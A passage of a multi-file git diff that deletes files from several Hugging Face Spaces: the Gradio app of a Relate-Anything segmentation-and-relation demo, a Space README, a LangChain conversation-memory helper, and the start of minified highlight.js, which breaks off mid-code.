-device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') - -input_size = 512 -hidden_size = 256 -num_classes = 56 - -# load sam model -sam = build_sam(checkpoint="./checkpoints/sam_vit_h_4b8939.pth").to(device) -predictor = SamPredictor(sam) -mask_generator = SamAutomaticMaskGenerator(sam) - -# load ram model -model_path = "./checkpoints/ram_epoch12.pth" -config = dict( - model=dict( - pretrained_model_name_or_path='bert-base-uncased', - load_pretrained_weights=False, - num_transformer_layer=2, - input_feature_size=256, - output_feature_size=768, - cls_feature_size=512, - num_relation_classes=56, - pred_type='attention', - loss_type='multi_label_ce', - ), - load_from=model_path, -) -config = Config(config) - -class Predictor(RamPredictor): - def __init__(self,config): - self.config = config - self.device = torch.device( - 'cuda' if torch.cuda.is_available() else 'cpu') - self._build_model() - - def _build_model(self): - self.model = RamModel(**self.config.model).to(self.device) - if self.config.load_from is not None: - self.model.load_state_dict(torch.load(self.config.load_from, map_location=self.device)) - self.model.train() - -model = Predictor(config) - - -# visualization -def draw_selected_mask(mask, draw): - color = (255, 0, 0, 153) - nonzero_coords = np.transpose(np.nonzero(mask)) - for coord in nonzero_coords: - draw.point(coord[::-1], fill=color) - -def draw_object_mask(mask, draw): - color = (0, 0, 255, 153) - nonzero_coords = np.transpose(np.nonzero(mask)) - for coord in nonzero_coords: - draw.point(coord[::-1], fill=color) - - -def vis_selected(pil_image, coords): - w, h = pil_image.size - max_edge = 1500 - if w > max_edge or h > max_edge: - ratio = max(w, h) / max_edge - new_size = (int(w / ratio), int(h / ratio)) - pil_image.thumbnail(new_size) - coords = str(int(int(coords.split(',')[0]) * new_size[0] / w)) + ',' + str(int(int(coords.split(',')[1]) * new_size[1] / h)) - - # get coords - coords_x, coords_y = coords.split(',') - 
input_point = np.array([[int(coords_x), int(coords_y)]]) - input_label = np.array([1]) - - # load image - image = np.array(pil_image) - predictor.set_image(image) - mask1, score1, logit1, feat1 = predictor.predict( - point_coords=input_point, - point_labels=input_label, - multimask_output=False, - ) - pil_image = pil_image.convert('RGBA') - mask_image = Image.new('RGBA', pil_image.size, color=(0, 0, 0, 0)) - mask_draw = ImageDraw.Draw(mask_image) - draw_selected_mask(mask1[0], mask_draw) - pil_image.alpha_composite(mask_image) - - yield [pil_image] - - -def create_title_image(word1, word2, word3, width, font_path='./assets/OpenSans-Bold.ttf'): - # Define the colors to use for each word - color_red = (255, 0, 0) - color_black = (0, 0, 0) - color_blue = (0, 0, 255) - - # Define the initial font size and spacing between words - font_size = 40 - - # Create a new image with the specified width and white background - image = Image.new('RGB', (width, 60), (255, 255, 255)) - - # Load the specified font - font = ImageFont.truetype(font_path, font_size) - - # Keep increasing the font size until all words fit within the desired width - while True: - # Create a draw object for the image - draw = ImageDraw.Draw(image) - - word_spacing = font_size / 2 - # Draw each word in the appropriate color - x_offset = word_spacing - draw.text((x_offset, 0), word1, color_red, font=font) - x_offset += font.getsize(word1)[0] + word_spacing - draw.text((x_offset, 0), word2, color_black, font=font) - x_offset += font.getsize(word2)[0] + word_spacing - draw.text((x_offset, 0), word3, color_blue, font=font) - - word_sizes = [font.getsize(word) for word in [word1, word2, word3]] - total_width = sum([size[0] for size in word_sizes]) + word_spacing * 3 - - # Stop increasing font size if the image is within the desired width - if total_width <= width: - break - - # Increase font size and reset the draw object - font_size -= 1 - image = Image.new('RGB', (width, 50), (255, 255, 255)) - font = 
ImageFont.truetype(font_path, font_size) - draw = None - - return image - - -def concatenate_images_vertical(image1, image2): - # Get the dimensions of the two images - width1, height1 = image1.size - width2, height2 = image2.size - - # Create a new image with the combined height and the maximum width - new_image = Image.new('RGBA', (max(width1, width2), height1 + height2)) - - # Paste the first image at the top of the new image - new_image.paste(image1, (0, 0)) - - # Paste the second image below the first image - new_image.paste(image2, (0, height1)) - - return new_image - - -def relate_selected(input_image, k, coords): - # load image - pil_image = input_image.convert('RGBA') - - w, h = pil_image.size - max_edge = 1500 - if w > max_edge or h > max_edge: - ratio = max(w, h) / max_edge - new_size = (int(w / ratio), int(h / ratio)) - pil_image.thumbnail(new_size) - input_image.thumbnail(new_size) - coords = str(int(int(coords.split(',')[0]) * new_size[0] / w)) + ',' + str(int(int(coords.split(',')[1]) * new_size[1] / h)) - - image = np.array(input_image) - sam_masks = mask_generator.generate(image) - # get old mask - coords_x, coords_y = coords.split(',') - input_point = np.array([[int(coords_x), int(coords_y)]]) - input_label = np.array([1]) - mask1, score1, logit1, feat1 = predictor.predict( - point_coords=input_point, - point_labels=input_label, - multimask_output=False, - ) - - filtered_masks = sort_and_deduplicate(sam_masks) - filtered_masks = [d for d in sam_masks if iou(d['segmentation'], mask1[0]) < 0.95][:k] - pil_image_list = [] - - # run model - feat = feat1 - for fm in filtered_masks: - feat2 = torch.Tensor(fm['feat']).unsqueeze(0).unsqueeze(0).to(device) - feat = torch.cat((feat, feat2), dim=1) - matrix_output, rel_triplets = model.predict(feat) - subject_output = matrix_output.permute([0,2,3,1])[:,0,1:] - - for i in range(len(filtered_masks)): - - output = subject_output[:,i] - - topk_indices = torch.argsort(-output).flatten() - relation = 
relation_classes[topk_indices[:1][0]] - - mask_image = Image.new('RGBA', pil_image.size, color=(0, 0, 0, 0)) - mask_draw = ImageDraw.Draw(mask_image) - - draw_selected_mask(mask1[0], mask_draw) - draw_object_mask(filtered_masks[i]['segmentation'], mask_draw) - - current_pil_image = pil_image.copy() - current_pil_image.alpha_composite(mask_image) - - title_image = create_title_image('Red', relation, 'Blue', current_pil_image.size[0]) - concate_pil_image = concatenate_images_vertical(current_pil_image, title_image) - pil_image_list.append(concate_pil_image) - - yield pil_image_list - - -def relate_anything(input_image, k): - w, h = input_image.size - max_edge = 1500 - if w > max_edge or h > max_edge: - ratio = max(w, h) / max_edge - new_size = (int(w / ratio), int(h / ratio)) - input_image.thumbnail(new_size) - - # load image - pil_image = input_image.convert('RGBA') - image = np.array(input_image) - sam_masks = mask_generator.generate(image) - filtered_masks = sort_and_deduplicate(sam_masks) - - feat_list = [] - for fm in filtered_masks: - feat = torch.Tensor(fm['feat']).unsqueeze(0).unsqueeze(0).to(device) - feat_list.append(feat) - feat = torch.cat(feat_list, dim=1).to(device) - matrix_output, rel_triplets = model.predict(feat) - - pil_image_list = [] - for i, rel in enumerate(rel_triplets[:k]): - s,o,r = int(rel[0]),int(rel[1]),int(rel[2]) - relation = relation_classes[r] - - mask_image = Image.new('RGBA', pil_image.size, color=(0, 0, 0, 0)) - mask_draw = ImageDraw.Draw(mask_image) - - draw_selected_mask(filtered_masks[s]['segmentation'], mask_draw) - draw_object_mask(filtered_masks[o]['segmentation'], mask_draw) - - current_pil_image = pil_image.copy() - current_pil_image.alpha_composite(mask_image) - - title_image = create_title_image('Red', relation, 'Blue', current_pil_image.size[0]) - concate_pil_image = concatenate_images_vertical(current_pil_image, title_image) - pil_image_list.append(concate_pil_image) - - yield pil_image_list - -DESCRIPTION = '''# 
Relate-Anyting - -### 🚀 🚀 🚀 RAM (Relate-Anything-Model) combines Meta's Segment-Anything model with the ECCV'22 paper: [Panoptic Scene Graph Generation](https://psgdataset.org/). -### 🤔 🤔 🤔 Given an image, RAM finds all the meaningful relations between anything. (Check Tab: Relate Anything) -### 🖱️ 🖱️ 🖱️ You can also click something on the image, and RAM find anything relates to that. (Check Tab: Relate Something) -### 🔥 🔥 🔥 Please star our codebase [OpenPSG](https://github.com/Jingkang50/OpenPSG) and [RAM](https://github.com/Luodian/RelateAnything) if you find it useful / interesting. -### It is recommended to upgrade to GPU in Settings after duplicating this space to use it. [![Duplicate this Space](https://huggingface.co/datasets/huggingface/badges/raw/main/duplicate-this-space-md-dark.svg)](https://huggingface.co/spaces/mmlab-ntu/relate-anything-model?duplicate=true) -### Here is a 3-day Gradio link: https://bf5e65e511446cbe60.gradio.live/, expires by 3am, April 28, Singapore Time. -''' - -block = gr.Blocks() -block = block.queue() -with block: - gr.Markdown(DESCRIPTION) - with gr.Row(): - with gr.Column(): - input_image = gr.Image(source="upload", type="pil", value="assets/dog.jpg") - - with gr.Tab("Relate Anything"): - num_relation = gr.Slider(label="How many relations do you want to see", minimum=1, maximum=20, value=5, step=1) - relate_all_button = gr.Button(label="Relate Anything!") - - with gr.Tab("Relate Something"): - img_input_coords = gr.Textbox(label="Click something to get input coords") - - def select_handler(evt: gr.SelectData): - coords = evt.index - return f"{coords[0]},{coords[1]}" - - input_image.select(select_handler, None, img_input_coords) - run_button_vis = gr.Button(label="Visualize the Select Thing") - selected_gallery = gr.Gallery(label="Selected Thing", show_label=True, elem_id="gallery").style(object_fit="scale-down") - - k = gr.Slider(label="Number of things you want to relate", minimum=1, maximum=20, value=5, step=1) - 
relate_selected_button = gr.Button(value="Relate it with Anything", interactive=True) - - with gr.Column(): - image_gallery = gr.Gallery(label="Your Result", show_label=True, elem_id="gallery").style(preview=True, columns=5, object_fit="scale-down") - - # relate anything - relate_all_button.click(fn=relate_anything, inputs=[input_image, num_relation], outputs=[image_gallery], show_progress=True, queue=True) - - # relate selected - run_button_vis.click(fn=vis_selected, inputs=[input_image, img_input_coords], outputs=[selected_gallery], show_progress=True, queue=True) - relate_selected_button.click(fn=relate_selected, inputs=[input_image, k, img_input_coords], outputs=[image_gallery], show_progress=True, queue=True) - -block.launch() diff --git a/spaces/moin1234/XAGPT1/README.md b/spaces/moin1234/XAGPT1/README.md deleted file mode 100644 index 4cac071bfc45d19f64a73ae610f32c5c963abc5b..0000000000000000000000000000000000000000 --- a/spaces/moin1234/XAGPT1/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: XAGPT1 -emoji: 🐨 -colorFrom: gray -colorTo: blue -sdk: streamlit -sdk_version: 1.27.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/momegas/megabots/megabots/memory.py b/spaces/momegas/megabots/megabots/memory.py deleted file mode 100644 index a54ed06aa4694eaca138b8b73540d43a57a39b62..0000000000000000000000000000000000000000 --- a/spaces/momegas/megabots/megabots/memory.py +++ /dev/null @@ -1,45 +0,0 @@ -from langchain.memory import ConversationBufferMemory, ConversationBufferWindowMemory - - -class ConversationBuffer: - def __init__(self): - self.memory = ConversationBufferMemory(input_key="question") - - -class ConversationBufferWindow: - def __init__(self, k: int): - self.k: int = k - self.memory = ConversationBufferWindowMemory(k=self.k, input_key="question") - - -SUPPORTED_MEMORY = { - "conversation-buffer": { - "impl": ConversationBuffer, - 
"default": {}, - }, - "conversation-buffer-window": { - "impl": ConversationBufferWindow, - "default": {"k": 3}, - }, -} - - -Memory = type("Memory", (ConversationBuffer, ConversationBufferWindow), {}) - - -def memory( - name: str = "conversation-buffer-window", - k: int | None = None, -) -> Memory: - if name is None: - raise RuntimeError("Impossible to instantiate memory without a name.") - - if name not in SUPPORTED_MEMORY: - raise ValueError(f"Memory {name} is not supported.") - - cl = SUPPORTED_MEMORY[name]["impl"] - - if name == "conversation-buffer-window": - return cl(k=k or SUPPORTED_MEMORY[name]["default"]["k"]) - - return SUPPORTED_MEMORY[name]["impl"]() diff --git a/spaces/monra/freegpt-webui/client/js/highlight.min.js b/spaces/monra/freegpt-webui/client/js/highlight.min.js deleted file mode 100644 index d410b45b38119606525a0a7c0c60c428c5ee6eb7..0000000000000000000000000000000000000000 --- a/spaces/monra/freegpt-webui/client/js/highlight.min.js +++ /dev/null @@ -1 +0,0 @@ -var hljs=function(){"use strict";var e={exports:{}};function n(e){return e instanceof Map?e.clear=e.delete=e.set=()=>{throw Error("map is read-only")}:e instanceof Set&&(e.add=e.clear=e.delete=()=>{throw Error("set is read-only")}),Object.freeze(e),Object.getOwnPropertyNames(e).forEach(t=>{var a=e[t];"object"!=typeof a||Object.isFrozen(a)||n(a)}),e}e.exports=n,e.exports.default=n;class t{constructor(e){void 0===e.data&&(e.data={}),this.data=e.data,this.isMatchIgnored=!1}ignoreMatch(){this.isMatchIgnored=!0}}function a(e){return e.replace(/&/g,"&").replace(//g,">").replace(/"/g,""").replace(/'/g,"'")}function i(e,...n){let t=Object.create(null);for(let a in e)t[a]=e[a];return n.forEach(e=>{for(let n in e)t[n]=e[n]}),t}let r=e=>!!e.scope||e.sublanguage&&e.language;class s{constructor(e,n){this.buffer="",this.classPrefix=n.classPrefix,e.walk(this)}addText(e){this.buffer+=a(e)}openNode(e){if(!r(e))return;let 
n="";n=e.sublanguage?"language-"+e.language:((e,{prefix:n})=>{if(e.includes(".")){let t=e.split(".");return[`${n}${t.shift()}`,...t.map((e,n)=>`${e}${"_".repeat(n+1)}`),].join(" ")}return`${n}${e}`})(e.scope,{prefix:this.classPrefix}),this.span(n)}closeNode(e){r(e)&&(this.buffer+="")}value(){return this.buffer}span(e){this.buffer+=``}}let l=(e={})=>{let n={children:[]};return Object.assign(n,e),n};class o{constructor(){this.rootNode=l(),this.stack=[this.rootNode]}get top(){return this.stack[this.stack.length-1]}get root(){return this.rootNode}add(e){this.top.children.push(e)}openNode(e){let n=l({scope:e});this.add(n),this.stack.push(n)}closeNode(){if(this.stack.length>1)return this.stack.pop()}closeAllNodes(){for(;this.closeNode(););}toJSON(){return JSON.stringify(this.rootNode,null,4)}walk(e){return this.constructor._walk(e,this.rootNode)}static _walk(e,n){return"string"==typeof n?e.addText(n):n.children&&(e.openNode(n),n.children.forEach(n=>this._walk(e,n)),e.closeNode(n)),e}static _collapse(e){"string"!=typeof e&&e.children&&(e.children.every(e=>"string"==typeof e)?e.children=[e.children.join("")]:e.children.forEach(e=>{o._collapse(e)}))}}class c extends o{constructor(e){super(),this.options=e}addKeyword(e,n){""!==e&&(this.openNode(n),this.addText(e),this.closeNode())}addText(e){""!==e&&this.add(e)}addSublanguage(e,n){let t=e.root;t.sublanguage=!0,t.language=n,this.add(t)}toHTML(){return new s(this,this.options).value()}finalize(){return!0}}function d(e){return e?"string"==typeof e?e:e.source:null}function g(e){return m("(?=",e,")")}function u(e){return m("(?:",e,")*")}function b(e){return m("(?:",e,")?")}function m(...e){return e.map(e=>d(e)).join("")}function p(...e){let n=(e=>{let n=e[e.length-1];return"object"==typeof n&&n.constructor===Object?(e.splice(e.length-1,1),n):{}})(e);return"("+(n.capture?"":"?:")+e.map(e=>d(e)).join("|")+")"}function h(e){return RegExp(e.toString()+"|").exec("").length-1}let 
f=/\[(?:[^\\\]]|\\.)*\]|\(\??|\\([1-9][0-9]*)|\\./;function E(e,{joinWith:n}){let t=0;return e.map(e=>{t+=1;let n=t,a=d(e),i="";for(;a.length>0;){let r=f.exec(a);if(!r){i+=a;break}i+=a.substring(0,r.index),a=a.substring(r.index+r[0].length),"\\"===r[0][0]&&r[1]?i+="\\"+(Number(r[1])+n):(i+=r[0],"("===r[0]&&t++)}return i}).map(e=>`(${e})`).join(n)}let $="[a-zA-Z]\\w*",y="[a-zA-Z_]\\w*",N="\\b\\d+(\\.\\d+)?",w="(-?)(\\b0[xX][a-fA-F0-9]+|(\\b\\d+(\\.\\d*)?|\\.\\d+)([eE][-+]?\\d+)?)",v="\\b(0b[01]+)",x={begin:"\\\\[\\s\\S]",relevance:0},k=(e,n,t={})=>{let a=i({scope:"comment",begin:e,end:n,contains:[]},t);a.contains.push({scope:"doctag",begin:"[ ]*(?=(TODO|FIXME|NOTE|BUG|OPTIMIZE|HACK|XXX):)",end:/(TODO|FIXME|NOTE|BUG|OPTIMIZE|HACK|XXX):/,excludeBegin:!0,relevance:0});let r=p("I","a","is","so","us","to","at","if","in","it","on",/[A-Za-z]+['](d|ve|re|ll|t|s|n)/,/[A-Za-z]+[-][a-z]+/,/[A-Za-z][a-z]{2,}/);return a.contains.push({begin:m(/[ ]+/,"(",r,/[.]?[:]?([.][ ]|[ ])/,"){3}")}),a},M=k("//","$"),O=k("/\\*","\\*/"),S=k("#","$");var A=Object.freeze({__proto__:null,MATCH_NOTHING_RE:/\b\B/,IDENT_RE:$,UNDERSCORE_IDENT_RE:y,NUMBER_RE:N,C_NUMBER_RE:w,BINARY_NUMBER_RE:v,RE_STARTERS_RE:"!|!=|!==|%|%=|&|&&|&=|\\*|\\*=|\\+|\\+=|,|-|-=|/=|/|:|;|<<|<<=|<=|<|===|==|=|>>>=|>>=|>=|>>>|>>|>|\\?|\\[|\\{|\\(|\\^|\\^=|\\||\\|=|\\|\\||~",SHEBANG(e={}){let n=/^#![ ]*\//;return 
e.binary&&(e.begin=m(n,/.*\b/,e.binary,/\b.*/)),i({scope:"meta",begin:n,end:/$/,relevance:0,"on:begin"(e,n){0!==e.index&&n.ignoreMatch()}},e)},BACKSLASH_ESCAPE:x,APOS_STRING_MODE:{scope:"string",begin:"'",end:"'",illegal:"\\n",contains:[x]},QUOTE_STRING_MODE:{scope:"string",begin:'"',end:'"',illegal:"\\n",contains:[x]},PHRASAL_WORDS_MODE:{begin:/\b(a|an|the|are|I'm|isn't|don't|doesn't|won't|but|just|should|pretty|simply|enough|gonna|going|wtf|so|such|will|you|your|they|like|more)\b/},COMMENT:k,C_LINE_COMMENT_MODE:M,C_BLOCK_COMMENT_MODE:O,HASH_COMMENT_MODE:S,NUMBER_MODE:{scope:"number",begin:N,relevance:0},C_NUMBER_MODE:{scope:"number",begin:w,relevance:0},BINARY_NUMBER_MODE:{scope:"number",begin:v,relevance:0},REGEXP_MODE:{begin:/(?=\/[^/\n]*\/)/,contains:[{scope:"regexp",begin:/\//,end:/\/[gimuy]*/,illegal:/\n/,contains:[x,{begin:/\[/,end:/\]/,relevance:0,contains:[x]},]},]},TITLE_MODE:{scope:"title",begin:$,relevance:0},UNDERSCORE_TITLE_MODE:{scope:"title",begin:y,relevance:0},METHOD_GUARD:{begin:"\\.\\s*[a-zA-Z_]\\w*",relevance:0},END_SAME_AS_BEGIN:e=>Object.assign(e,{"on:begin"(e,n){n.data._beginMatch=e[1]},"on:end"(e,n){n.data._beginMatch!==e[1]&&n.ignoreMatch()}})});function C(e,n){"."===e.input[e.index-1]&&n.ignoreMatch()}function T(e,n){void 0!==e.className&&(e.scope=e.className,delete e.className)}function R(e,n){n&&e.beginKeywords&&(e.begin="\\b("+e.beginKeywords.split(" ").join("|")+")(?!\\.)(?=\\b|\\s)",e.__beforeBegin=C,e.keywords=e.keywords||e.beginKeywords,delete e.beginKeywords,void 0===e.relevance&&(e.relevance=0))}function D(e,n){Array.isArray(e.illegal)&&(e.illegal=p(...e.illegal))}function I(e,n){if(e.match){if(e.begin||e.end)throw Error("begin & end are not supported with match");e.begin=e.match,delete e.match}}function L(e,n){void 0===e.relevance&&(e.relevance=1)}let B=(e,n)=>{if(!e.beforeMatch)return;if(e.starts)throw Error("beforeMatch cannot be used with starts");let t=Object.assign({},e);Object.keys(e).forEach(n=>{delete 
e[n]}),e.keywords=t.keywords,e.begin=m(t.beforeMatch,g(t.begin)),e.starts={relevance:0,contains:[Object.assign(t,{endsParent:!0})]},e.relevance=0,delete t.beforeMatch},_=["of","and","for","in","not","or","if","then","parent","list","value",],z={},F=e=>{console.error(e)},U=(e,...n)=>{},P=(e,n)=>{z[`${e}/${n}`]||(console.log(`Deprecated as of ${e}. ${n}`),z[`${e}/${n}`]=!0)},j=Error();function K(e,n,{key:t}){let a=0,i=e[t],r={},s={};for(let l=1;l<=n.length;l++)s[l+a]=i[l],r[l+a]=!0,a+=h(n[l-1]);e[t]=s,e[t]._emit=r,e[t]._multi=!0}function q(e){var n;(n=e).scope&&"object"==typeof n.scope&&null!==n.scope&&(n.beginScope=n.scope,delete n.scope),"string"==typeof e.beginScope&&(e.beginScope={_wrap:e.beginScope}),"string"==typeof e.endScope&&(e.endScope={_wrap:e.endScope}),(e=>{if(Array.isArray(e.begin)){if(e.skip||e.excludeBegin||e.returnBegin)throw F("skip, excludeBegin, returnBegin not compatible with beginScope: {}"),j;if("object"!=typeof e.beginScope||null===e.beginScope)throw F("beginScope must be object"),j;K(e,e.begin,{key:"beginScope"}),e.begin=E(e.begin,{joinWith:""})}})(e),(e=>{if(Array.isArray(e.end)){if(e.skip||e.excludeEnd||e.returnEnd)throw F("skip, excludeEnd, returnEnd not compatible with endScope: {}"),j;if("object"!=typeof e.endScope||null===e.endScope)throw F("endScope must be object"),j;K(e,e.end,{key:"endScope"}),e.end=E(e.end,{joinWith:""})}})(e)}class H extends Error{constructor(e,n){super(e),this.name="HTMLInjectionError",this.html=n}}let Z=a,G=i,W=Symbol("nomatch");var Q=(n=>{let a=Object.create(null),r=Object.create(null),s=[],l=!0,o="Could not find the language '{}', did you forget to load/include a language module?",f={disableAutodetect:!0,name:"Plain text",contains:[]},$={ignoreUnescapedHTML:!1,throwUnescapedHTML:!1,noHighlightRe:/^(no-?highlight)$/i,languageDetectRe:/\blang(?:uage)?-([\w-]+)\b/i,classPrefix:"hljs-",cssSelector:"pre code",languages:null,__emitter:c};function y(e){return $.noHighlightRe.test(e)}function N(e,n,t){let 
a="",i="";"object"==typeof n?(a=e,t=n.ignoreIllegals,i=n.language):(P("10.7.0","highlight(lang, code, ...args) has been deprecated."),P("10.7.0","Please use highlight(code, options) instead.\nhttps://github.com/highlightjs/highlight.js/issues/2277"),i=e,a=n),void 0===t&&(t=!0);let r={code:a,language:i};z("before:highlight",r);let s=r.result?r.result:w(r.language,r.code,t);return s.code=r.code,z("after:highlight",s),s}function w(e,n,r,s){let c=Object.create(null);function g(){var e;if(!M.keywords)return void A.addText(C);let n=0;M.keywordPatternRe.lastIndex=0;let t=M.keywordPatternRe.exec(C),a="";for(;t;){a+=C.substring(n,t.index);let i=N.case_insensitive?t[0].toLowerCase():t[0],r=(e=i,M.keywords[e]);if(r){let[s,l]=r;if(A.addText(a),a="",c[i]=(c[i]||0)+1,c[i]<=7&&(z+=l),s.startsWith("_"))a+=t[0];else{let o=N.classNameAliases[s]||s;A.addKeyword(t[0],o)}}else a+=t[0];n=M.keywordPatternRe.lastIndex,t=M.keywordPatternRe.exec(C)}a+=C.substring(n),A.addText(a)}function u(){null!=M.subLanguage?(()=>{if(""===C)return;let e=null;if("string"==typeof M.subLanguage){if(!a[M.subLanguage])return void A.addText(C);e=w(M.subLanguage,C,!0,S[M.subLanguage]),S[M.subLanguage]=e._top}else e=v(C,M.subLanguage.length?M.subLanguage:null);M.relevance>0&&(z+=e.relevance),A.addSublanguage(e._emitter,e.language)})():g(),C=""}function b(e,n){let t=1,a=n.length-1;for(;t<=a;){if(!e._emit[t]){t++;continue}let i=N.classNameAliases[e[t]]||e[t],r=n[t];i?A.addKeyword(r,i):(C=r,g(),C=""),t++}}function m(e,n){return e.scope&&"string"==typeof e.scope&&A.openNode(N.classNameAliases[e.scope]||e.scope),e.beginScope&&(e.beginScope._wrap?(A.addKeyword(C,N.classNameAliases[e.beginScope._wrap]||e.beginScope._wrap),C=""):e.beginScope._multi&&(b(e.beginScope,n),C="")),M=Object.create(e,{parent:{value:M}})}function p(e){return 0===M.matcher.regexIndex?(C+=e[0],1):(j=!0,0)}let f={};function y(a,i){let s=i&&i[0];if(C+=a,null==s)return 
u(),0;if("begin"===f.type&&"end"===i.type&&f.index===i.index&&""===s){if(C+=n.slice(i.index,i.index+1),!l){let o=Error(`0 width match regex (${e})`);throw o.languageName=e,o.badRule=f.rule,o}return 1}if(f=i,"begin"===i.type)return(e=>{let n=e[0],a=e.rule,i=new t(a),r=[a.__beforeBegin,a["on:begin"]];for(let s of r)if(s&&(s(e,i),i.isMatchIgnored))return p(n);return a.skip?C+=n:(a.excludeBegin&&(C+=n),u(),a.returnBegin||a.excludeBegin||(C=n)),m(a,e),a.returnBegin?0:n.length})(i);if("illegal"===i.type&&!r){let c=Error('Illegal lexeme "'+s+'" for mode "'+(M.scope||"")+'"');throw c.mode=M,c}if("end"===i.type){let d=function e(a){let i=a[0],r=n.substring(a.index),s=function e(n,a,i){let r=((e,n)=>{let t=e&&e.exec(n);return t&&0===t.index})(n.endRe,i);if(r){if(n["on:end"]){let s=new t(n);n["on:end"](a,s),s.isMatchIgnored&&(r=!1)}if(r){for(;n.endsParent&&n.parent;)n=n.parent;return n}}if(n.endsWithParent)return e(n.parent,a,i)}(M,a,r);if(!s)return W;let l=M;M.endScope&&M.endScope._wrap?(u(),A.addKeyword(i,M.endScope._wrap)):M.endScope&&M.endScope._multi?(u(),b(M.endScope,a)):l.skip?C+=i:(l.returnEnd||l.excludeEnd||(C+=i),u(),l.excludeEnd&&(C=i));do M.scope&&A.closeNode(),M.skip||M.subLanguage||(z+=M.relevance),M=M.parent;while(M!==s.parent);return s.starts&&m(s.starts,a),l.returnEnd?0:i.length}(i);if(d!==W)return d}if("illegal"===i.type&&""===s)return 1;if(P>1e5&&P>3*i.index)throw Error("potential infinite loop, way more iterations than matches");return C+=s,s.length}let N=O(e);if(!N)throw F(o.replace("{}",e)),Error('Unknown language: "'+e+'"');let x=function e(n){function t(e,t){return RegExp(d(e),"m"+(n.case_insensitive?"i":"")+(n.unicodeRegex?"u":"")+(t?"g":""))}class a{constructor(){this.matchIndexes={},this.regexes=[],this.matchAt=1,this.position=0}addRule(e,n){n.position=this.position++,this.matchIndexes[this.matchAt]=n,this.regexes.push([n,e]),this.matchAt+=h(e)+1}compile(){0===this.regexes.length&&(this.exec=()=>null);let 
e=this.regexes.map(e=>e[1]);this.matcherRe=t(E(e,{joinWith:"|"}),!0),this.lastIndex=0}exec(e){this.matcherRe.lastIndex=this.lastIndex;let n=this.matcherRe.exec(e);if(!n)return null;let t=n.findIndex((e,n)=>n>0&&void 0!==e),a=this.matchIndexes[t];return n.splice(0,t),Object.assign(n,a)}}class r{constructor(){this.rules=[],this.multiRegexes=[],this.count=0,this.lastIndex=0,this.regexIndex=0}getMatcher(e){if(this.multiRegexes[e])return this.multiRegexes[e];let n=new a;return this.rules.slice(e).forEach(([e,t])=>n.addRule(e,t)),n.compile(),this.multiRegexes[e]=n,n}resumingScanAtSamePosition(){return 0!==this.regexIndex}considerAll(){this.regexIndex=0}addRule(e,n){this.rules.push([e,n]),"begin"===n.type&&this.count++}exec(e){let n=this.getMatcher(this.regexIndex);n.lastIndex=this.lastIndex;let t=n.exec(e);if(this.resumingScanAtSamePosition()){if(t&&t.index===this.lastIndex);else{let a=this.getMatcher(0);a.lastIndex=this.lastIndex+1,t=a.exec(e)}}return t&&(this.regexIndex+=t.position+1,this.regexIndex===this.count&&this.considerAll()),t}}if(n.compilerExtensions||(n.compilerExtensions=[]),n.contains&&n.contains.includes("self"))throw Error("ERR: contains `self` is not supported at the top-level of a language. 
See documentation.");return n.classNameAliases=i(n.classNameAliases||{}),function e(a,s){let l=a;if(a.isCompiled)return l;[T,I,q,B].forEach(e=>e(a,s)),n.compilerExtensions.forEach(e=>e(a,s)),a.__beforeBegin=null,[R,D,L].forEach(e=>e(a,s)),a.isCompiled=!0;let o=null;return"object"==typeof a.keywords&&a.keywords.$pattern&&(a.keywords=Object.assign({},a.keywords),o=a.keywords.$pattern,delete a.keywords.$pattern),o=o||/\w+/,a.keywords&&(a.keywords=function e(n,t,a="keyword"){let i=Object.create(null);return"string"==typeof n?r(a,n.split(" ")):Array.isArray(n)?r(a,n):Object.keys(n).forEach(a=>{Object.assign(i,e(n[a],t,a))}),i;function r(e,n){t&&(n=n.map(e=>e.toLowerCase())),n.forEach(n=>{var t,a,r;let s=n.split("|");i[s[0]]=[e,(t=s[0],a=s[1],a?Number(a):(r=t,_.includes(r.toLowerCase()))?0:1)]})}}(a.keywords,n.case_insensitive)),l.keywordPatternRe=t(o,!0),s&&(a.begin||(a.begin=/\B|\b/),l.beginRe=t(l.begin),a.end||a.endsWithParent||(a.end=/\B|\b/),a.end&&(l.endRe=t(l.end)),l.terminatorEnd=d(l.end)||"",a.endsWithParent&&s.terminatorEnd&&(l.terminatorEnd+=(a.end?"|":"")+s.terminatorEnd)),a.illegal&&(l.illegalRe=t(a.illegal)),a.contains||(a.contains=[]),a.contains=[].concat(...a.contains.map(e=>{var n;return(n="self"===e?a:e).variants&&!n.cachedVariants&&(n.cachedVariants=n.variants.map(e=>i(n,{variants:null},e))),n.cachedVariants?n.cachedVariants:!function e(n){return!!n&&(n.endsWithParent||e(n.starts))}(n)?Object.isFrozen(n)?i(n):n:i(n,{starts:n.starts?i(n.starts):null})})),a.contains.forEach(n=>{e(n,l)}),a.starts&&e(a.starts,s),l.matcher=(e=>{let n=new r;return e.contains.forEach(e=>n.addRule(e.begin,{rule:e,type:"begin"})),e.terminatorEnd&&n.addRule(e.terminatorEnd,{type:"end"}),e.illegal&&n.addRule(e.illegal,{type:"illegal"}),n})(l),l}(n)}(N),k="",M=s||x,S={},A=new $.__emitter($);(()=>{let e=[];for(let n=M;n!==N;n=n.parent)n.scope&&e.unshift(n.scope);e.forEach(e=>A.openNode(e))})();let 
C="",z=0,U=0,P=0,j=!1;try{for(M.matcher.considerAll();;){P++,j?j=!1:M.matcher.considerAll(),M.matcher.lastIndex=U;let K=M.matcher.exec(n);if(!K)break;let H=y(n.substring(U,K.index),K);U=K.index+H}return y(n.substring(U)),A.closeAllNodes(),A.finalize(),k=A.toHTML(),{language:e,value:k,relevance:z,illegal:!1,_emitter:A,_top:M}}catch(G){if(G.message&&G.message.includes("Illegal"))return{language:e,value:Z(n),illegal:!0,relevance:0,_illegalBy:{message:G.message,index:U,context:n.slice(U-100,U+100),mode:G.mode,resultSoFar:k},_emitter:A};if(l)return{language:e,value:Z(n),illegal:!1,relevance:0,errorRaised:G,_emitter:A,_top:M};throw G}}function v(e,n){n=n||$.languages||Object.keys(a);let t=(e=>{let n={value:Z(e),illegal:!1,relevance:0,_top:f,_emitter:new $.__emitter($)};return n._emitter.addText(e),n})(e),i=n.filter(O).filter(C).map(n=>w(n,e,!1));i.unshift(t);let r=i.sort((e,n)=>{if(e.relevance!==n.relevance)return n.relevance-e.relevance;if(e.language&&n.language){if(O(e.language).supersetOf===n.language)return 1;if(O(n.language).supersetOf===e.language)return 